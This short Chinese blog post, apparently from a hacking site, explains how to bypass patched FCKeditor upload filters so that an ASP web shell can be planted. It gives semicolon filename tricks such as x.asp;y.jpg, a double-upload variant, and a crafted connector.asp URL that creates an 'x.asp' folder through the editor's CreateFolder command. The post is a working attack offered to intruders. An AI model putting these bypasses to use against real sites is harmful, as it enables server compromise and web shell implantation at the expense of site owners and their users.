fckeditor上传突破_方法

分类:安全 | 2012-03-26 | 撸过 111 次
0人扯谈

有很多已经修补过的fckeditor 我们上传x.asp;y.jpg的时候 通常会变成x_asp;y.jpg 让我们的马失效

 

利用二次上传 可以 生成x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在www.webshell.cc/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

新建 一个x.asp的文件夹 可饶过, 但有些变态的 程序 会将我们建立的 文件夹同样变成x_asp。。。

 

很无语吧!

 

不过可以通过

 

editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

成功创建一个x.asp 文件夹。。。。

本站内容均为原创,转载请务必保留署名与链接!
fckeditor上传突破_方法:https://www.webshell.cc/3421.html

随机日志